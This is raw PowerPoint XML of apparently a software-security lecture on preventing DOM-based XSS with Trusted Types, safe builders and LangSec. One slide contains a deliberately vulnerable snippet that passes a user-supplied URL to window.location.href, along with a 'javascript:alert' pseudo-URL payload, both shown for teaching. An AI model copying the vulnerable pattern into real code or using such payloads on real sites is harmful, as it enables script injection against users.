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114"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId115"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="878" r:id="rId3"/>
    <p:sldId id="708" r:id="rId4"/>
    <p:sldId id="674" r:id="rId5"/>
    <p:sldId id="867" r:id="rId6"/>
    <p:sldId id="791" r:id="rId7"/>
    <p:sldId id="781" r:id="rId8"/>
    <p:sldId id="785" r:id="rId9"/>
    <p:sldId id="786" r:id="rId10"/>
    <p:sldId id="736" r:id="rId11"/>
    <p:sldId id="858" r:id="rId12"/>
    <p:sldId id="789" r:id="rId13"/>
    <p:sldId id="876" r:id="rId14"/>
    <p:sldId id="877" r:id="rId15"/>
    <p:sldId id="792" r:id="rId16"/>
    <p:sldId id="793" r:id="rId17"/>
    <p:sldId id="794" r:id="rId18"/>
    <p:sldId id="683" r:id="rId19"/>
    <p:sldId id="681" r:id="rId20"/>
    <p:sldId id="692" r:id="rId21"/>
    <p:sldId id="693" r:id="rId22"/>
    <p:sldId id="774" r:id="rId23"/>
    <p:sldId id="685" r:id="rId24"/>
    <p:sldId id="695" r:id="rId25"/>
    <p:sldId id="696" r:id="rId26"/>
    <p:sldId id="471" r:id="rId27"/>
    <p:sldId id="733" r:id="rId28"/>
    <p:sldId id="558" r:id="rId29"/>
    <p:sldId id="435" r:id="rId30"/>
    <p:sldId id="559" r:id="rId31"/>
    <p:sldId id="489" r:id="rId32"/>
    <p:sldId id="477" r:id="rId33"/>
    <p:sldId id="478" r:id="rId34"/>
    <p:sldId id="488" r:id="rId35"/>
    <p:sldId id="734" r:id="rId36"/>
    <p:sldId id="859" r:id="rId37"/>
    <p:sldId id="853" r:id="rId38"/>
    <p:sldId id="795" r:id="rId39"/>
    <p:sldId id="848" r:id="rId40"/>
    <p:sldId id="688" r:id="rId41"/>
    <p:sldId id="716" r:id="rId42"/>
    <p:sldId id="590" r:id="rId43"/>
    <p:sldId id="589" r:id="rId44"/>
    <p:sldId id="583" r:id="rId45"/>
    <p:sldId id="581" r:id="rId46"/>
    <p:sldId id="586" r:id="rId47"/>
    <p:sldId id="585" r:id="rId48"/>
    <p:sldId id="823" r:id="rId49"/>
    <p:sldId id="346" r:id="rId50"/>
    <p:sldId id="851" r:id="rId51"/>
    <p:sldId id="591" r:id="rId52"/>
    <p:sldId id="596" r:id="rId53"/>
    <p:sldId id="759" r:id="rId54"/>
    <p:sldId id="855" r:id="rId55"/>
    <p:sldId id="856" r:id="rId56"/>
    <p:sldId id="824" r:id="rId57"/>
    <p:sldId id="506" r:id="rId58"/>
    <p:sldId id="857" r:id="rId59"/>
    <p:sldId id="826" r:id="rId60"/>
    <p:sldId id="849" r:id="rId61"/>
    <p:sldId id="349" r:id="rId62"/>
    <p:sldId id="432" r:id="rId63"/>
    <p:sldId id="354" r:id="rId64"/>
    <p:sldId id="353" r:id="rId65"/>
    <p:sldId id="395" r:id="rId66"/>
    <p:sldId id="352" r:id="rId67"/>
    <p:sldId id="860" r:id="rId68"/>
    <p:sldId id="721" r:id="rId69"/>
    <p:sldId id="744" r:id="rId70"/>
    <p:sldId id="745" r:id="rId71"/>
    <p:sldId id="746" r:id="rId72"/>
    <p:sldId id="748" r:id="rId73"/>
    <p:sldId id="827" r:id="rId74"/>
    <p:sldId id="830" r:id="rId75"/>
    <p:sldId id="752" r:id="rId76"/>
    <p:sldId id="753" r:id="rId77"/>
    <p:sldId id="754" r:id="rId78"/>
    <p:sldId id="812" r:id="rId79"/>
    <p:sldId id="852" r:id="rId80"/>
    <p:sldId id="836" r:id="rId81"/>
    <p:sldId id="828" r:id="rId82"/>
    <p:sldId id="831" r:id="rId83"/>
    <p:sldId id="832" r:id="rId84"/>
    <p:sldId id="834" r:id="rId85"/>
    <p:sldId id="829" r:id="rId86"/>
    <p:sldId id="813" r:id="rId87"/>
    <p:sldId id="818" r:id="rId88"/>
    <p:sldId id="820" r:id="rId89"/>
    <p:sldId id="850" r:id="rId90"/>
    <p:sldId id="805" r:id="rId91"/>
    <p:sldId id="479" r:id="rId92"/>
    <p:sldId id="480" r:id="rId93"/>
    <p:sldId id="840" r:id="rId94"/>
    <p:sldId id="838" r:id="rId95"/>
    <p:sldId id="811" r:id="rId96"/>
    <p:sldId id="847" r:id="rId97"/>
    <p:sldId id="839" r:id="rId98"/>
    <p:sldId id="505" r:id="rId99"/>
    <p:sldId id="453" r:id="rId100"/>
    <p:sldId id="842" r:id="rId101"/>
    <p:sldId id="492" r:id="rId102"/>
    <p:sldId id="843" r:id="rId103"/>
    <p:sldId id="846" r:id="rId104"/>
    <p:sldId id="841" r:id="rId105"/>
    <p:sldId id="817" r:id="rId106"/>
    <p:sldId id="844" r:id="rId107"/>
    <p:sldId id="749" r:id="rId108"/>
    <p:sldId id="416" r:id="rId109"/>
    <p:sldId id="483" r:id="rId110"/>
    <p:sldId id="845" r:id="rId111"/>
    <p:sldId id="428" r:id="rId112"/>
    <p:sldId id="495" r:id="rId113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Poll" initials="EP" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="Erik P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339933"/>
    <a:srgbClr val="000000"/>
    <a:srgbClr val="FF9900"/>
    <a:srgbClr val="008000"/>
    <a:srgbClr val="FF6600"/>
    <a:srgbClr val="33CC33"/>
    <a:srgbClr val="006600"/>
    <a:srgbClr val="66FF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73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6883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07/11/2025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‹#›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365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68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69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1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70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71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0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A5A288-02E4-42F5-A645-5F7284397B2E}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL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385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7D753-C99B-4E75-90FE-81941CAA4172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6266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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15828C71-D6C5-89A8-86A6-CBAD72C52C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8EE3255-428B-4790-85C6-DA49DE67F17D}" type="slidenum">
              <a:rPr lang="en-GB" altLang="en-US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pPr/>
              <a:t>90</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="0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CC39BF88-AC62-38ED-12B2-BCFDBCB7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62702E-A340-45E8-B959-7BC84B2369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1038" y="4716463"/>
            <a:ext cx="5427662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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1369C4FC-AEB4-958A-7A7E-2D8B73AB50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CAF259F-AB06-42CF-9D59-2D34C4C6CFA5}" type="slidenum">
              <a:rPr lang="en-GB" altLang="en-US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pPr/>
              <a:t>91</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="0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774B0589-51C1-3FCE-F6B7-8C3482C1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B3038A2C-1579-A244-DA0C-75849F5E8A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1038" y="4716463"/>
            <a:ext cx="5427662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D550023D-A403-497F-BD78-4EE37DF165D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97</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:cs typeface="Times New Roman" pitchFamily="18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1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019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10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7842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35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3981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895D830B-8453-07E4-3A87-2A7E70F9FE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14E7CD-37D4-43A6-866E-B713C1870663}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL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GB" altLang="nl-NL" sz="1300"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65B5BF78-3A44-EC39-5B92-82D9845D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0283B206-E4DC-870E-E621-32A8D25876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895D830B-8453-07E4-3A87-2A7E70F9FE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14E7CD-37D4-43A6-866E-B713C1870663}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL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GB" altLang="nl-NL" sz="1300"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65B5BF78-3A44-EC39-5B92-82D9845D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0283B206-E4DC-870E-E621-32A8D25876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9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98DF9C2A-9D61-6155-922D-C1214955E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7E22C84B-DD7D-43B6-DA78-56F74056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DFE19733-F420-E02F-97FE-D73C15CFD9C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3B275ED-43E8-4AA5-B9D3-29A094783B08}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL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58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98DF9C2A-9D61-6155-922D-C1214955E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7E22C84B-DD7D-43B6-DA78-56F74056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DFE19733-F420-E02F-97FE-D73C15CFD9C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3B275ED-43E8-4AA5-B9D3-29A094783B08}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL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61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8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67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ctr">
              <a:defRPr sz="1814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80" y="1977327"/>
            <a:ext cx="7771680" cy="1500638"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="254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EB0-5426-4115-B1A1-BE4B8952066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589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81D-423D-4691-A409-FB2B6259717A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0737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E8B5-0B6A-439E-8DD8-4B62EB8DA477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785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2051-0689-466F-801D-3169EFE505AB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629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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18611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218E-0481-4205-9DD0-7FB663384F66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888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4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2583360" y="6247376"/>
            <a:ext cx="38030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BF67-ACF3-4BC0-8580-DE31188868C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816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8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147801"/>
            <a:ext cx="8225280" cy="49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23680" y="6247376"/>
            <a:ext cx="38030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E233DDCF-2EC9-403A-8D1D-24A69B0A0E28}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0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92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/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1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280994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695720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110446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525172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11045" indent="-311045" algn="l" defTabSz="446407" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="11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77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673930" indent="-259204" algn="l" defTabSz="446407" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="11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036815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451541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1866268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280994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27E47-8448-FD23-04C1-56A37071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bugs of the week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F6F18-B6CE-988B-3CD5-F2711CDE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1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1200" dirty="0"/>
              <a:t>                                                     https://thehackernews.com/2025/11/googles-ai-big-sleep-finds-5-new.html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Big Sleep </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>is Google’s project to use AI for security flaws finding;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CodeMender</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> is a newer project to use it to fix security flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0"/>
              <a:t>                 https://deepmind.google/blog/introducing-codemender-an-ai-agent-for-code-security/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0169-611C-C896-B5D7-EF44BFF9C3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1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" alt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9F00FA-46BD-3DB2-A0ED-408FF4F3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33" y="2015815"/>
            <a:ext cx="5811061" cy="2295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E4F3F-6362-9EB5-0E49-DC51EBF7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61" y="1086026"/>
            <a:ext cx="547763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3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Understanding root causes </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="72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FF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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>problems</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL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3561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Preventing DOM-based XSS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5"/>
            <a:ext cx="7761288" cy="49601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/>
              <a:t>Writing JavaScript code that properly validates and encodes user input is hard!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en-GB" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>Modern web pages use a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>LOT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> of client side JS code, using large libraries, to provide fancy webpages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en-GB" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a: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/>
              <a:t>The DOM API methods take </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> as arguments, but for these strings it is hard to trace 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where they come from? (are they user input?)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have they been validated? if so, how exactly? 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rgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>have been encoded? and if so, how </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exacty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933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Here we can use the safe builder approach!</a:t>
            </a:r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endParaRPr lang="en-GB" altLang="en-US" sz="1451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100</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL"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845345"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> API hardening for the DOM API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>(aka Trusted Types)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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Safe builder approach </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for JavaScript &amp; DOM API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use TypeScript rather than JavaScript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use  different types instead of just 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String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,                                                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g.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TrustedHtml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TrustedJavaScript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TrustedUrl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TrustedScriptUrl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="18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…</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" alt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replace string-based DOM API with new typed API where operations  take the right 'safe' type as parameter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z="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eg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GB" altLang="nl-NL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altLang="nl-NL" sz="18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1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>takes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="18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TrustedHtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> instead of a 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String</a:t>
            </a:r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 marL="300426" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Typing guarantees proper escaping &amp; validation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="700476" lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>This is checked statically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="300426" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>DOM API must be replaced &amp; all JS code needs to be rewritten </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="14676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ym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>but ... this can be done incrementally, using old &amp; new APIs side by side</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="51841" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRP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altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/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https://github.com/WICG/trusted-types] </a:t>
            </a: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altLang="en-US" sz="1400" dirty="0"/>
              <a:t>[Released as a Chrome browser feature in 2019</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="414726" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>    https://developers.google.com/web/updates/2019/02/trusted-types]              </a:t>
            </a:r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101</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL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387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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B56A5489-B309-33DF-201A-ECA49878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 Custom tweaks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/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8A3E58C3-ADAA-1653-983B-AB29B53B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The Trusted Types / API hardening approach can be customised/extended to specific application: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For example, Brightspace allows a restricted set of HTML tags in forum postings.       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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To do this we would introduce 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introduce a custom type, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="18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SafeForumPosting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, 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specify which functions require input of this type  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define custom operations to generate data of this type, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2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Using validation and/or encoding. This code should be rigorously reviewed to make sure it is bullet-proof!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GB" altLang="en-US" sz="1451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83E24935-90B6-7657-E4A7-CFD4BCD76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6D31DAA-3625-4737-8B21-01FD7D1D5F15}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL">
                <a:ea typeface="DejaVu Sans"/>
                <a:cs typeface="DejaVu Sans"/>
              </a:rPr>
              <a:pPr/>
              <a:t>102</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL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454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Yet another complication:  different kind of URLs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103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1570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Suppose we let users add a link to jump to their homepage on another website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&lt;html&gt;  &lt;body&gt;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&lt;h1&gt;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&lt;/h1&gt;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${description}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&lt;script&gt; function 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goHome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()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{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window.location.href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=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homeUrl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;}  &lt;/script&gt;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&lt;button type="button"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onclick="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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goHome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()"&gt;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Click here to go to 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's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home page!&lt;/button&gt;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...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Spot the XSS, if we allow users to specify any  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i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homeUrl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" i="1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Browsers support </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pseudo URLs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>starting with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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, e.g.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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javascript:alert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('Hi!').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Assigning such a URL to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location.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  will execute the script!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User-supplied URLs have to be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t> validated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to check for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javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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URLs: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server-side, of if its passed around in JS, client-side in JS code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The Trusted Types API uses special type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" b="1" dirty="0" err="1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TrustedResourceUrl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0099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for sinks, such as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location.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, where (pseudo) URLs can trigger execution of scripts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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87566-93B7-9B84-A3DA-8AA83AD31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F6CAC9-B460-06FA-A7FA-76F3484EE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B8BDE-6AA5-751A-579A-29A6C82887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82084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03F9-13C9-6621-2CB9-4FED8BBC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&amp; Parsing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351F-0F47-E1A0-3622-2824950F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Parsing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of many </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>languages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formats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representations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, ...) is where input problems happen, due to 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insecure parsing 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incorrect parsing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parsing differentials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unintended parsing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injection attacks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especially if languages are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>complex,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poorly defined, and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very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expressive</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="339933"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LangSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> approach </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>can prevent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buggy - insecure or incorrect - incorrect parsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Safe builder approach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>generalises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9933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parameterised</a:t>
            </a:r>
            <a:r>
